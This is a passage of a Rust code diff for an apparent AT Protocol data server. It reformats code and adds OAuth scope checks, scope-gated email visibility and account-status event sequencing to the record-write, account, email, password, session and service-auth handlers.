··· 48 48 let user_id: uuid::Uuid = match user_id_opt { 49 49 Ok(Some(id)) => id, 50 50 Ok(None) => { 51 - if let Some(proxy_header) = headers 52 - .get("atproto-proxy") 53 - .and_then(|h| h.to_str().ok()) 54 - { 51 + if let Some(proxy_header) = headers.get("atproto-proxy").and_then(|h| h.to_str().ok()) { 55 52 let did = proxy_header.split('#').next().unwrap_or(proxy_header); 56 53 if let Some(resolved) = state.did_resolver.resolve_did(did).await { 57 54 let mut url = format!( ··· 84 81 .header("content-type", "application/json") 85 82 .body(axum::body::Body::from(body)) 86 83 .unwrap_or_else(|_| { 87 - (StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response() 84 + (StatusCode::INTERNAL_SERVER_ERROR, "Internal error") 85 + .into_response() 88 86 }); 89 87 } 90 88 Err(e) => { ··· 138 136 } 139 137 }; 140 138 if let Some(expected_cid) = &input.cid 141 - && &record_cid_str != expected_cid { 142 - return ( 143 - StatusCode::NOT_FOUND, 144 - Json(json!({"error": "NotFound", "message": "Record CID mismatch"})), 145 - ) 146 - .into_response(); 147 - } 139 + && &record_cid_str != expected_cid 140 + { 141 + return ( 142 + StatusCode::NOT_FOUND, 143 + Json(json!({"error": "NotFound", "message": "Record CID mismatch"})), 144 + ) 145 + .into_response(); 146 + } 148 147 let cid = match Cid::from_str(&record_cid_str) { 149 148 Ok(c) => c, 150 149 Err(_) => { ··· 326 325 for (cid, block_opt) in cids.iter().zip(blocks.into_iter()) { 327 326 if let Some(block) = block_opt 328 327 && let Some((rkey, cid_str)) = cid_to_rkey.get(cid) 329 - && let Ok(value) = serde_ipld_dagcbor::from_slice::<serde_json::Value>(&block) { 330 - records.push(json!({ 331 - "uri": format!("at://{}/{}/{}", input.repo, input.collection, rkey), 332 - "cid": cid_str, 333 - "value": value 334 - })); 335 - } 328 + && let Ok(value) = serde_ipld_dagcbor::from_slice::<serde_json::Value>(&block) 329 + { 330 + records.push(json!({ 331 + "uri": format!("at://{}/{}/{}", input.repo, input.collection, rkey), 332 + "cid": cid_str, 333 + "value": value 334 + })); 335 + } 336 336 } 337 337 Json(ListRecordsOutput { 338 338 cursor: last_rkey,
+84 -37
src/api/repo/record/utils.rs
··· 151 151 match lock_result { 152 152 Err(e) => { 153 153 if let Some(db_err) = e.as_database_error() 154 - && db_err.code().as_deref() == Some("55P03") { 155 - return Err( 156 - "ConcurrentModification: Another request is modifying this repo" 157 - .to_string(), 158 - ); 159 - } 154 + && db_err.code().as_deref() == Some("55P03") 155 + { 156 + return Err( 157 + "ConcurrentModification: Another request is modifying this repo".to_string(), 158 + ); 159 + } 160 160 return Err(format!("Failed to acquire repo lock: {}", e)); 161 161 } 162 162 Ok(Some(row)) => { 163 163 if let Some(expected_root) = &current_root_cid 164 - && row.repo_root_cid != expected_root.to_string() { 165 - return Err( 166 - "ConcurrentModification: Repo has been modified since last read" 167 - .to_string(), 168 - ); 169 - } 164 + && row.repo_root_cid != expected_root.to_string() 165 + { 166 + return Err( 167 + "ConcurrentModification: Repo has been modified since last read".to_string(), 168 + ); 169 + } 170 170 } 171 171 Ok(None) => { 172 172 return Err("Repo not found".to_string()); 173 173 } 174 174 } 175 + let is_account_active = sqlx::query_scalar!( 176 + "SELECT deactivated_at IS NULL FROM users WHERE id = $1", 177 + user_id 178 + ) 179 + .fetch_optional(&mut *tx) 180 + .await 181 + .map_err(|e| format!("Failed to check account status: {}", e))? 182 + .flatten() 183 + .unwrap_or(false); 175 184 sqlx::query!( 176 185 "UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2", 177 186 new_root_cid.to_string(), ··· 289 298 } 290 299 }) 291 300 .collect::<Vec<_>>(); 292 - let event_type = "commit"; 293 - let prev_cid_str = current_root_cid.map(|c| c.to_string()); 294 - let prev_data_cid_str = prev_data_cid.map(|c| c.to_string()); 295 - let seq_row = sqlx::query!( 296 - r#" 297 - INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids, prev_data_cid) 298 - VALUES ($1, $2, $3, $4, $5, $6, $7, $8) 299 - RETURNING seq 300 - "#, 301 - did, 302 - event_type, 303 - new_root_cid.to_string(), 304 - prev_cid_str, 305 - json!(ops_json), 306 - &[] as &[String], 307 - blocks_cids, 308 - prev_data_cid_str, 309 - ) 310 - .fetch_one(&mut *tx) 311 - .await 312 - .map_err(|e| format!("DB Error (repo_seq): {}", e))?; 313 - sqlx::query(&format!("NOTIFY repo_updates, '{}'", seq_row.seq)) 314 - .execute(&mut *tx) 301 + if is_account_active { 302 + let event_type = "commit"; 303 + let prev_cid_str = current_root_cid.map(|c| c.to_string()); 304 + let prev_data_cid_str = prev_data_cid.map(|c| c.to_string()); 305 + let seq_row = sqlx::query!( 306 + r#" 307 + INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids, prev_data_cid) 308 + VALUES ($1, $2, $3, $4, $5, $6, $7, $8) 309 + RETURNING seq 310 + "#, 311 + did, 312 + event_type, 313 + new_root_cid.to_string(), 314 + prev_cid_str, 315 + json!(ops_json), 316 + &[] as &[String], 317 + blocks_cids, 318 + prev_data_cid_str, 319 + ) 320 + .fetch_one(&mut *tx) 315 321 .await 316 - .map_err(|e| format!("DB Error (notify): {}", e))?; 322 + .map_err(|e| format!("DB Error (repo_seq): {}", e))?; 323 + sqlx::query(&format!("NOTIFY repo_updates, '{}'", seq_row.seq)) 324 + .execute(&mut *tx) 325 + .await 326 + .map_err(|e| format!("DB Error (notify): {}", e))?; 327 + } 317 328 tx.commit() 318 329 .await 319 330 .map_err(|e| format!("Failed to commit transaction: {}", e))?; 320 - let _ = sequence_sync_event(state, did, &new_root_cid.to_string()).await; 331 + if is_account_active { 332 + let _ = sequence_sync_event(state, did, &new_root_cid.to_string()).await; 333 + } 321 334 Ok(CommitResult { 322 335 commit_cid: new_root_cid, 323 336 rev: rev_str, ··· 482 495 .map_err(|e| format!("DB Error (notify): {}", e))?; 483 496 Ok(seq_row.seq) 484 497 } 498 + 499 + pub async fn sequence_empty_commit_event(state: &AppState, did: &str) -> Result<i64, String> { 500 + let repo_root = sqlx::query_scalar!( 501 + "SELECT r.repo_root_cid FROM repos r JOIN users u ON r.user_id = u.id WHERE u.did = $1", 502 + did 503 + ) 504 + .fetch_optional(&state.db) 505 + .await 506 + .map_err(|e| format!("DB Error fetching repo root: {}", e))? 507 + .ok_or_else(|| "Repo not found".to_string())?; 508 + let ops = serde_json::json!([]); 509 + let blobs: Vec<String> = vec![]; 510 + let blocks_cids: Vec<String> = vec![]; 511 + let seq_row = sqlx::query!( 512 + r#" 513 + INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids) 514 + VALUES ($1, 'commit', $2, $2, $3, $4, $5) 515 + RETURNING seq 516 + "#, 517 + did, 518 + repo_root, 519 + ops, 520 + &blobs, 521 + &blocks_cids 522 + ) 523 + .fetch_one(&state.db) 524 + .await 525 + .map_err(|e| format!("DB Error (repo_seq empty commit): {}", e))?; 526 + sqlx::query(&format!("NOTIFY repo_updates, '{}'", seq_row.seq)) 527 + .execute(&state.db) 528 + .await 529 + .map_err(|e| format!("DB Error (notify): {}", e))?; 530 + Ok(seq_row.seq) 531 + }
+100 -35
src/api/repo/record/write.rs
··· 22 22 use tracing::error; 23 23 use uuid::Uuid; 24 24 25 - pub async fn has_verified_comms_channel( 26 - db: &PgPool, 27 - did: &str, 28 - ) -> Result<bool, sqlx::Error> { 25 + pub async fn has_verified_comms_channel(db: &PgPool, did: &str) -> Result<bool, sqlx::Error> { 29 26 let row = sqlx::query( 30 27 r#" 31 28 SELECT ··· 52 49 } 53 50 } 54 51 52 + pub struct RepoWriteAuth { 53 + pub did: String, 54 + pub user_id: Uuid, 55 + pub current_root_cid: Cid, 56 + pub is_oauth: bool, 57 + pub scope: Option<String>, 58 + } 59 + 55 60 pub async fn prepare_repo_write( 56 61 state: &AppState, 57 62 headers: &HeaderMap, 58 63 repo_did: &str, 59 64 http_method: &str, 60 65 http_uri: &str, 61 - ) -> Result<(String, Uuid, Cid), Response> { 66 + ) -> Result<RepoWriteAuth, Response> { 62 67 let extracted = crate::auth::extract_auth_token_from_header( 63 68 headers.get("Authorization").and_then(|h| h.to_str().ok()), 64 69 ) ··· 69 74 ) 70 75 .into_response() 71 76 })?; 72 - let dpop_proof = headers 73 - .get("DPoP") 74 - .and_then(|h| h.to_str().ok()); 77 + let dpop_proof = headers.get("DPoP").and_then(|h| h.to_str().ok()); 75 78 let auth_user = crate::auth::validate_token_with_dpop( 76 79 &state.db, 77 80 &extracted.token, ··· 163 166 ) 164 167 .into_response() 165 168 })?; 166 - Ok((auth_user.did, user_id, current_root_cid)) 169 + Ok(RepoWriteAuth { 170 + did: auth_user.did, 171 + user_id, 172 + current_root_cid, 173 + is_oauth: auth_user.is_oauth, 174 + scope: auth_user.scope, 175 + }) 167 176 } 168 177 #[derive(Deserialize)] 169 178 #[allow(dead_code)] ··· 188 197 axum::extract::OriginalUri(uri): axum::extract::OriginalUri, 189 198 Json(input): Json<CreateRecordInput>, 190 199 ) -> Response { 191 - let (did, user_id, current_root_cid) = 200 + let auth = 192 201 match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await { 193 202 Ok(res) => res, 194 203 Err(err_res) => return err_res, 195 204 }; 205 + 206 + if let Err(e) = crate::auth::scope_check::check_repo_scope( 207 + auth.is_oauth, 208 + auth.scope.as_deref(), 209 + crate::oauth::RepoAction::Create, 210 + &input.collection, 211 + ) { 212 + return e; 213 + } 214 + 215 + let did = auth.did; 216 + let user_id = auth.user_id; 217 + let current_root_cid = auth.current_root_cid; 218 + 196 219 if let Some(swap_commit) = &input.swap_commit 197 - && Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 198 - return ( 199 - StatusCode::CONFLICT, 200 - Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 201 - ) 202 - .into_response(); 203 - } 220 + && Cid::from_str(swap_commit).ok() != Some(current_root_cid) 221 + { 222 + return ( 223 + StatusCode::CONFLICT, 224 + Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 225 + ) 226 + .into_response(); 227 + } 204 228 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 205 229 let commit_bytes = match tracking_store.get(&current_root_cid).await { 206 230 Ok(Some(b)) => b, ··· 234 258 } 235 259 }; 236 260 if input.validate.unwrap_or(true) 237 - && let Err(err_response) = validate_record(&input.record, &input.collection) { 238 - return *err_response; 239 - } 261 + && let Err(err_response) = validate_record(&input.record, &input.collection) 262 + { 263 + return *err_response; 264 + } 240 265 let rkey = input 241 266 .rkey 242 267 .unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string()); ··· 285 310 cid: record_cid, 286 311 }; 287 312 let mut relevant_blocks = std::collections::BTreeMap::new(); 288 - if new_mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 313 + if new_mst 314 + .blocks_for_path(&key, &mut relevant_blocks) 315 + .await 316 + .is_err() 317 + { 289 318 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 290 319 } 291 - if mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 320 + if mst 321 + .blocks_for_path(&key, &mut relevant_blocks) 322 + .await 323 + .is_err() 324 + { 292 325 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response(); 293 326 } 294 327 relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes)); ··· 356 389 axum::extract::OriginalUri(uri): axum::extract::OriginalUri, 357 390 Json(input): Json<PutRecordInput>, 358 391 ) -> Response { 359 - let (did, user_id, current_root_cid) = 392 + let auth = 360 393 match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await { 361 394 Ok(res) => res, 362 395 Err(err_res) => return err_res, 363 396 }; 397 + 398 + if let Err(e) = crate::auth::scope_check::check_repo_scope( 399 + auth.is_oauth, 400 + auth.scope.as_deref(), 401 + crate::oauth::RepoAction::Create, 402 + &input.collection, 403 + ) { 404 + return e; 405 + } 406 + if let Err(e) = crate::auth::scope_check::check_repo_scope( 407 + auth.is_oauth, 408 + auth.scope.as_deref(), 409 + crate::oauth::RepoAction::Update, 410 + &input.collection, 411 + ) { 412 + return e; 413 + } 414 + 415 + let did = auth.did; 416 + let user_id = auth.user_id; 417 + let current_root_cid = auth.current_root_cid; 418 + 364 419 if let Some(swap_commit) = &input.swap_commit 365 - && Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 366 - return ( 367 - StatusCode::CONFLICT, 368 - Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 369 - ) 370 - .into_response(); 371 - } 420 + && Cid::from_str(swap_commit).ok() != Some(current_root_cid) 421 + { 422 + return ( 423 + StatusCode::CONFLICT, 424 + Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 425 + ) 426 + .into_response(); 427 + } 372 428 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 373 429 let commit_bytes = match tracking_store.get(&current_root_cid).await { 374 430 Ok(Some(b)) => b, ··· 403 459 }; 404 460 let key = format!("{}/{}", collection_nsid, input.rkey); 405 461 if input.validate.unwrap_or(true) 406 - && let Err(err_response) = validate_record(&input.record, &input.collection) { 407 - return *err_response; 408 - } 462 + && let Err(err_response) = validate_record(&input.record, &input.collection) 463 + { 464 + return *err_response; 465 + } 409 466 if let Some(swap_record_str) = &input.swap_record { 410 467 let expected_cid = Cid::from_str(swap_record_str).ok(); 411 468 let actual_cid = mst.get(&key).await.ok().flatten(); ··· 480 537 } 481 538 }; 482 539 let mut relevant_blocks = std::collections::BTreeMap::new(); 483 - if new_mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 540 + if new_mst 541 + .blocks_for_path(&key, &mut relevant_blocks) 542 + .await 543 + .is_err() 544 + { 484 545 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 485 546 } 486 - if mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 547 + if mst 548 + .blocks_for_path(&key, &mut relevant_blocks) 549 + .await 550 + .is_err() 551 + { 487 552 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response(); 488 553 } 489 554 relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes));
+57 -13
src/api/server/account_status.rs
··· 133 133 "https://{}/xrpc/com.atproto.server.activateAccount", 134 134 std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()) 135 135 ); 136 - let did = match crate::auth::validate_token_with_dpop( 136 + let auth_user = match crate::auth::validate_token_with_dpop( 137 137 &state.db, 138 138 &extracted.token, 139 139 extracted.is_dpop, ··· 144 144 ) 145 145 .await 146 146 { 147 - Ok(user) => user.did, 147 + Ok(user) => user, 148 148 Err(e) => return ApiError::from(e).into_response(), 149 149 }; 150 + 151 + if let Err(e) = crate::auth::scope_check::check_account_scope( 152 + auth_user.is_oauth, 153 + auth_user.scope.as_deref(), 154 + crate::oauth::scopes::AccountAttr::Repo, 155 + crate::oauth::scopes::AccountAction::Manage, 156 + ) { 157 + return e; 158 + } 159 + 160 + let did = auth_user.did; 150 161 let handle = sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", did) 151 162 .fetch_optional(&state.db) 152 163 .await ··· 171 182 { 172 183 warn!("Failed to sequence identity event for activation: {}", e); 173 184 } 185 + if let Err(e) = 186 + crate::api::repo::record::sequence_empty_commit_event(&state, &did).await 187 + { 188 + warn!( 189 + "Failed to sequence empty commit event for activation: {}", 190 + e 191 + ); 192 + } 174 193 (StatusCode::OK, Json(json!({}))).into_response() 175 194 } 176 195 Err(e) => { ··· 206 225 "https://{}/xrpc/com.atproto.server.deactivateAccount", 207 226 std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()) 208 227 ); 209 - let did = match crate::auth::validate_token_with_dpop( 228 + let auth_user = match crate::auth::validate_token_with_dpop( 210 229 &state.db, 211 230 &extracted.token, 212 231 extracted.is_dpop, ··· 217 236 ) 218 237 .await 219 238 { 220 - Ok(user) => user.did, 239 + Ok(user) => user, 221 240 Err(e) => return ApiError::from(e).into_response(), 222 241 }; 242 + 243 + if let Err(e) = crate::auth::scope_check::check_account_scope( 244 + auth_user.is_oauth, 245 + auth_user.scope.as_deref(), 246 + crate::oauth::scopes::AccountAttr::Repo, 247 + crate::oauth::scopes::AccountAction::Manage, 248 + ) { 249 + return e; 250 + } 251 + 252 + let did = auth_user.did; 223 253 let handle = sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", did) 224 254 .fetch_optional(&state.db) 225 255 .await ··· 236 266 if let Some(ref h) = handle { 237 267 let _ = state.cache.delete(&format!("handle:{}", h)).await; 238 268 } 239 - if let Err(e) = 240 - crate::api::repo::record::sequence_account_event(&state, &did, false, Some("deactivated")).await 269 + if let Err(e) = crate::api::repo::record::sequence_account_event( 270 + &state, 271 + &did, 272 + false, 273 + Some("deactivated"), 274 + ) 275 + .await 241 276 { 242 277 warn!("Failed to sequence account deactivation event: {}", e); 243 278 } ··· 315 350 .into_response(); 316 351 } 317 352 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 318 - if let Err(e) = crate::comms::enqueue_account_deletion( 319 - &state.db, 320 - user_id, 321 - &confirmation_token, 322 - &hostname, 323 - ) 324 - .await 353 + if let Err(e) = 354 + crate::comms::enqueue_account_deletion(&state.db, user_id, &confirmation_token, &hostname) 355 + .await 325 356 { 326 357 warn!("Failed to enqueue account deletion notification: {:?}", e); 327 358 } ··· 501 532 Json(json!({"error": "InternalError"})), 502 533 ) 503 534 .into_response(); 535 + } 536 + if let Err(e) = crate::api::repo::record::sequence_account_event( 537 + &state, 538 + did, 539 + false, 540 + Some("deleted"), 541 + ) 542 + .await 543 + { 544 + warn!( 545 + "Failed to sequence account deletion event for {}: {}", 546 + did, e 547 + ); 504 548 } 505 549 let _ = state.cache.delete(&format!("handle:{}", handle)).await; 506 550 info!("Account {} deleted successfully", did);
+41 -14
src/api/server/email.rs
··· 52 52 }; 53 53 54 54 let auth_result = crate::auth::validate_bearer_token(&state.db, &token).await; 55 - let did = match auth_result { 56 - Ok(user) => user.did, 55 + let auth_user = match auth_result { 56 + Ok(user) => user, 57 57 Err(e) => return ApiError::from(e).into_response(), 58 58 }; 59 59 60 + if let Err(e) = crate::auth::scope_check::check_account_scope( 61 + auth_user.is_oauth, 62 + auth_user.scope.as_deref(), 63 + crate::oauth::scopes::AccountAttr::Email, 64 + crate::oauth::scopes::AccountAction::Manage, 65 + ) { 66 + return e; 67 + } 68 + 69 + let did = auth_user.did; 60 70 let user = match sqlx::query!("SELECT id, handle, email FROM users WHERE did = $1", did) 61 71 .fetch_optional(&state.db) 62 72 .await ··· 167 177 }; 168 178 169 179 let auth_result = crate::auth::validate_bearer_token(&state.db, &token).await; 170 - let did = match auth_result { 171 - Ok(user) => user.did, 180 + let auth_user = match auth_result { 181 + Ok(user) => user, 172 182 Err(e) => return ApiError::from(e).into_response(), 173 183 }; 174 184 185 + if let Err(e) = crate::auth::scope_check::check_account_scope( 186 + auth_user.is_oauth, 187 + auth_user.scope.as_deref(), 188 + crate::oauth::scopes::AccountAttr::Email, 189 + crate::oauth::scopes::AccountAction::Manage, 190 + ) { 191 + return e; 192 + } 193 + 194 + let did = auth_user.did; 175 195 let user_id = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 176 196 .fetch_one(&state.db) 177 197 .await ··· 274 294 return ApiError::InternalError.into_response(); 275 295 } 276 296 277 - if let Err(_) = tx.commit().await { 297 + if tx.commit().await.is_err() { 278 298 return ApiError::InternalError.into_response(); 279 299 } 280 300 ··· 310 330 }; 311 331 312 332 let auth_result = crate::auth::validate_bearer_token(&state.db, &token).await; 313 - let did = match auth_result { 314 - Ok(user) => user.did, 333 + let auth_user = match auth_result { 334 + Ok(user) => user, 315 335 Err(e) => return ApiError::from(e).into_response(), 316 336 }; 317 337 318 - let user = match sqlx::query!( 319 - "SELECT id, email FROM users WHERE did = $1", 320 - did 321 - ) 322 - .fetch_optional(&state.db) 323 - .await 338 + if let Err(e) = crate::auth::scope_check::check_account_scope( 339 + auth_user.is_oauth, 340 + auth_user.scope.as_deref(), 341 + crate::oauth::scopes::AccountAttr::Email, 342 + crate::oauth::scopes::AccountAction::Manage, 343 + ) { 344 + return e; 345 + } 346 + 347 + let did = auth_user.did; 348 + let user = match sqlx::query!("SELECT id, email FROM users WHERE did = $1", did) 349 + .fetch_optional(&state.db) 350 + .await 324 351 { 325 352 Ok(Some(row)) => row, 326 353 _ => { ··· 451 478 .execute(&mut *tx) 452 479 .await; 453 480 454 - if let Err(_) = tx.commit().await { 481 + if tx.commit().await.is_err() { 455 482 return ApiError::InternalError.into_response(); 456 483 } 457 484
+15 -15
src/api/server/password.rs
··· 8 8 }; 9 9 use bcrypt::{DEFAULT_COST, hash, verify}; 10 10 use chrono::{Duration, Utc}; 11 - use uuid::Uuid; 12 11 use serde::Deserialize; 13 12 use serde_json::json; 14 13 use tracing::{error, info, warn}; 14 + use uuid::Uuid; 15 15 16 16 fn generate_reset_code() -> String { 17 17 crate::util::generate_token_code() ··· 19 19 fn extract_client_ip(headers: &HeaderMap) -> String { 20 20 if let Some(forwarded) = headers.get("x-forwarded-for") 21 21 && let Ok(value) = forwarded.to_str() 22 - && let Some(first_ip) = value.split(',').next() { 23 - return first_ip.trim().to_string(); 24 - } 22 + && let Some(first_ip) = value.split(',').next() 23 + { 24 + return first_ip.trim().to_string(); 25 + } 25 26 if let Some(real_ip) = headers.get("x-real-ip") 26 - && let Ok(value) = real_ip.to_str() { 27 - return value.trim().to_string(); 28 - } 27 + && let Ok(value) = real_ip.to_str() 28 + { 29 + return value.trim().to_string(); 30 + } 29 31 "unknown".to_string() 30 32 } 31 33 ··· 99 101 .into_response(); 100 102 } 101 103 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 102 - if let Err(e) = 103 - crate::comms::enqueue_password_reset(&state.db, user_id, &code, &hostname).await 104 + if let Err(e) = crate::comms::enqueue_password_reset(&state.db, user_id, &code, &hostname).await 104 105 { 105 106 warn!("Failed to enqueue password reset notification: {:?}", e); 106 107 } ··· 335 336 ) 336 337 .into_response(); 337 338 } 338 - let user = sqlx::query_as::<_, (Uuid, String)>( 339 - "SELECT id, password_hash FROM users WHERE did = $1", 340 - ) 341 - .bind(&auth.0.did) 342 - .fetch_optional(&state.db) 343 - .await; 339 + let user = 340 + sqlx::query_as::<_, (Uuid, String)>("SELECT id, password_hash FROM users WHERE did = $1") 341 + .bind(&auth.0.did) 342 + .fetch_optional(&state.db) 343 + .await; 344 344 let (user_id, password_hash) = match user { 345 345 Ok(Some(row)) => row, 346 346 Ok(None) => {
+50 -22
src/api/server/service_auth.rs
··· 55 55 Some(t) => t, 56 56 None => return ApiError::AuthenticationRequired.into_response(), 57 57 }; 58 - let auth_user = match crate::auth::validate_bearer_token_for_service_auth(&state.db, &token).await { 59 - Ok(user) => user, 60 - Err(e) => return ApiError::from(e).into_response(), 61 - }; 62 - let key_bytes = match auth_user.key_bytes { 63 - Some(kb) => kb, 58 + let auth_user = 59 + match crate::auth::validate_bearer_token_for_service_auth(&state.db, &token).await { 60 + Ok(user) => user, 61 + Err(e) => return ApiError::from(e).into_response(), 62 + }; 63 + let key_bytes = match &auth_user.key_bytes { 64 + Some(kb) => kb.clone(), 64 65 None => { 65 66 return ApiError::AuthenticationFailedMsg( 66 67 "OAuth tokens cannot create service auth".into(), ··· 71 72 72 73 let lxm = params.lxm.as_deref(); 73 74 let lxm_for_token = lxm.unwrap_or("*"); 75 + 76 + if let Some(method) = lxm { 77 + if let Err(e) = crate::auth::scope_check::check_rpc_scope( 78 + auth_user.is_oauth, 79 + auth_user.scope.as_deref(), 80 + &params.aud, 81 + method, 82 + ) { 83 + return e; 84 + } 85 + } else if auth_user.is_oauth { 86 + let permissions = auth_user.permissions(); 87 + if !permissions.has_full_access() { 88 + return ( 89 + StatusCode::BAD_REQUEST, 90 + Json(json!({ 91 + "error": "InvalidRequest", 92 + "message": "OAuth tokens with granular scopes must specify an lxm parameter" 93 + })), 94 + ) 95 + .into_response(); 96 + } 97 + } 74 98 75 99 let user_status = sqlx::query!( 76 100 "SELECT takedown_ref FROM users WHERE did = $1", ··· 95 119 .into_response(); 96 120 } 97 121 98 - if let Some(method) = lxm { 99 - if PROTECTED_METHODS.contains(&method) { 100 - return ( 122 + if let Some(method) = lxm 123 + && PROTECTED_METHODS.contains(&method) 124 + { 125 + return ( 101 126 StatusCode::BAD_REQUEST, 102 127 Json(json!({ 103 128 "error": "InvalidRequest", ··· 105 130 })), 106 131 ) 107 132 .into_response(); 108 - } 109 133 } 110 134 111 135 if let Some(exp) = params.exp { ··· 146 170 } 147 171 } 148 172 149 - let service_token = 150 - match crate::auth::create_service_token(&auth_user.did, &params.aud, lxm_for_token, &key_bytes) { 151 - Ok(t) => t, 152 - Err(e) => { 153 - error!("Failed to create service token: {:?}", e); 154 - return ( 155 - StatusCode::INTERNAL_SERVER_ERROR, 156 - Json(json!({"error": "InternalError"})), 157 - ) 158 - .into_response(); 159 - } 160 - }; 173 + let service_token = match crate::auth::create_service_token( 174 + &auth_user.did, 175 + &params.aud, 176 + lxm_for_token, 177 + &key_bytes, 178 + ) { 179 + Ok(t) => t, 180 + Err(e) => { 181 + error!("Failed to create service token: {:?}", e); 182 + return ( 183 + StatusCode::INTERNAL_SERVER_ERROR, 184 + Json(json!({"error": "InternalError"})), 185 + ) 186 + .into_response(); 187 + } 188 + }; 161 189 ( 162 190 StatusCode::OK, 163 191 Json(GetServiceAuthOutput {
+49 -36
src/api/server/session.rs
··· 16 16 fn extract_client_ip(headers: &HeaderMap) -> String { 17 17 if let Some(forwarded) = headers.get("x-forwarded-for") 18 18 && let Ok(value) = forwarded.to_str() 19 - && let Some(first_ip) = value.split(',').next() { 20 - return first_ip.trim().to_string(); 21 - } 19 + && let Some(first_ip) = value.split(',').next() 20 + { 21 + return first_ip.trim().to_string(); 22 + } 22 23 if let Some(real_ip) = headers.get("x-real-ip") 23 - && let Ok(value) = real_ip.to_str() { 24 - return value.trim().to_string(); 25 - } 24 + && let Ok(value) = real_ip.to_str() 25 + { 26 + return value.trim().to_string(); 27 + } 26 28 "unknown".to_string() 27 29 } 28 30 ··· 36 38 } 37 39 38 40 fn full_handle(stored_handle: &str, pds_hostname: &str) -> String { 39 - if stored_handle.contains('.') { 41 + let suffix = format!(".{}", pds_hostname); 42 + if stored_handle.ends_with(&suffix) || stored_handle.ends_with(pds_hostname) { 40 43 stored_handle.to_string() 41 44 } else { 42 45 format!("{}.{}", stored_handle, pds_hostname) ··· 191 194 State(state): State<AppState>, 192 195 BearerAuthAllowDeactivated(auth_user): BearerAuthAllowDeactivated, 193 196 ) -> Response { 197 + let permissions = auth_user.permissions(); 198 + let can_read_email = permissions.allows_email_read(); 199 + 194 200 match sqlx::query!( 195 201 r#"SELECT 196 202 handle, email, email_verified, is_admin, deactivated_at, ··· 209 215 crate::comms::CommsChannel::Telegram => ("telegram", row.telegram_verified), 210 216 crate::comms::CommsChannel::Signal => ("signal", row.signal_verified), 211 217 }; 212 - let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 218 + let pds_hostname = 219 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 213 220 let handle = full_handle(&row.handle, &pds_hostname); 214 221 let is_active = row.deactivated_at.is_none(); 222 + let email_value = if can_read_email { 223 + row.email.clone() 224 + } else { 225 + None 226 + }; 227 + let email_verified_value = can_read_email && row.email_verified; 215 228 Json(json!({ 216 229 "handle": handle, 217 230 "did": auth_user.did, 218 - "email": row.email, 219 - "emailVerified": row.email_verified, 231 + "email": email_value, 232 + "emailVerified": email_verified_value, 220 233 "preferredChannel": preferred_channel, 221 234 "preferredChannelVerified": preferred_channel_verified, 222 235 "isAdmin": row.is_admin, 223 236 "active": is_active, 224 237 "status": if is_active { "active" } else { "deactivated" }, 225 238 "didDoc": {} 226 - })).into_response() 239 + })) 240 + .into_response() 227 241 } 228 242 Ok(None) => ApiError::AuthenticationFailed.into_response(), 229 243 Err(e) => { ··· 433 447 crate::comms::CommsChannel::Telegram => ("telegram", u.telegram_verified), 434 448 crate::comms::CommsChannel::Signal => ("signal", u.signal_verified), 435 449 }; 436 - let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 450 + let pds_hostname = 451 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 437 452 let handle = full_handle(&u.handle, &pds_hostname); 438 453 Json(json!({ 439 454 "accessJwt": new_access_meta.token, ··· 446 461 "preferredChannelVerified": preferred_channel_verified, 447 462 "isAdmin": u.is_admin, 448 463 "active": true 449 - })).into_response() 464 + })) 465 + .into_response() 450 466 } 451 467 Ok(None) => { 452 468 error!("User not found for existing session: {}", session_row.did); ··· 500 516 Ok(Some(row)) => row, 501 517 Ok(None) => { 502 518 warn!("User not found for confirm_signup: {}", input.did); 503 - return ApiError::InvalidRequest("Invalid DID or verification code".into()).into_response(); 519 + return ApiError::InvalidRequest("Invalid DID or verification code".into()) 520 + .into_response(); 504 521 } 505 522 Err(e) => { 506 523 error!("Database error in confirm_signup: {:?}", e); ··· 532 549 } 533 550 if verification.expires_at < Utc::now() { 534 551 warn!("Verification code expired for user: {}", input.did); 535 - return ApiError::ExpiredTokenMsg("Verification code 